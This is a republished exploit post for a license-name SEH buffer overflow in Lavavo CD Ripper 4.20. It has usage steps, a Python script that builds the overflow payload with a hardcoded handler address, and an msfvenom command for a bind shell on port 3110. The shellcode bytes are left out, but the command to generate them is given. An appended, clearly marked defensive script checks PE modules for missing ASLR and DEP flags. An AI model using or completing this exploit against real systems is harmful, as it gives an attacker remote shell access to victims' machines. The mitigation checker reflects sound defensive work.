Lavavo CD Ripper 4.20 – ‘License Activation Name’ Buffer Overflow (SEH) – Digitalmunition




Published on April 28th, 2019

# Exploit Title: Lavavo CD Ripper 4.20 Local SEH Exploit
# Date: 25.04.2019
# Vendor Homepage: https://www.lavavosoftware.com
# Software Link: https://lavavo-cd-ripper.jaleco.com/download
# Exploit Author: Achilles
# Tested Version: 4.20
# Tested on: Windows XP SP3 EN
#            Windows 7 SP1 x64

# 1.- Run python code : Lavavo.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open LavavoCDRipper.exe and click UNLOCK.
# 4.- Paste the Content of EVIL.txt into the 'License Activation Name'
# 5.- License Key 123456789
# 6.- Click 'Unlock Now' and you will have a bind shell port 3110.

#!/usr/bin/env python
import struct

buffer = "\x41" * 300
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x1003157d) #libsndfile.dll
nops =  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ""  # encoded msfvenom output (28 lines of bytes) not reproduced here
# Python 2 script: all parts are byte strings, padded to a fixed 6000-byte payload
pad = "C" * (6000 - len(buffer) - len(nseh + seh) - len(nops) - len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
    # File name matches the one referenced in step 2 above
    with open("EVIL.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError:
    print("File cannot be created")

https://www.exploit-db.com/exploits/46755
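
An added defensive example, not part of the original PoC and not code from the vendor or from libsndfile: the PoC depends on a hardcoded handler address inside libsndfile.dll and on executing bytes from the overflowed buffer, which ASLR and DEP respectively are designed to break. The sketch below reads the DllCharacteristics field of a PE image to report which of those two opt-in flags a module lacks. The helper names and the constructed sample headers are assumptions for illustration, and SafeSEH (recorded in the load configuration directory) is not checked.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE optional header
FLAGS = {
    "DYNAMIC_BASE (ASLR)": 0x0040,
    "NX_COMPAT (DEP)": 0x0100,
}

def dll_characteristics(data):
    """Return the DllCharacteristics word of a PE image given its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)     # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    opt = pe_off + 4 + 20                                # skip signature + COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):                      # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics is at offset 70 of the optional header in both formats
    (chars,) = struct.unpack_from("<H", data, opt + 70)
    return chars

def missing_mitigations(data):
    """List the opt-in mitigation flags that the image does not set."""
    chars = dll_characteristics(data)
    return sorted(name for name, bit in FLAGS.items() if not chars & bit)

def make_sample(chars):
    """Constructed minimal PE32 header (hypothetical, not a real DLL)."""
    img = bytearray(0x200)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)              # e_lfanew -> 0x80
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x80 + 24, 0x10B)        # PE32 magic
    struct.pack_into("<H", img, 0x80 + 24 + 70, chars)   # DllCharacteristics
    return bytes(img)

if __name__ == "__main__":
    legacy = make_sample(0x0000)      # constructed: no mitigation bits set
    hardened = make_sample(0x0140)    # constructed: DYNAMIC_BASE | NX_COMPAT
    print("legacy module lacks:  ", missing_mitigations(legacy))
    print("hardened module lacks:", missing_mitigations(hardened))
```

To audit a real installation, pass the bytes of each module shipped with the application (read with `open(path, "rb").read()`) to `missing_mitigations`.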
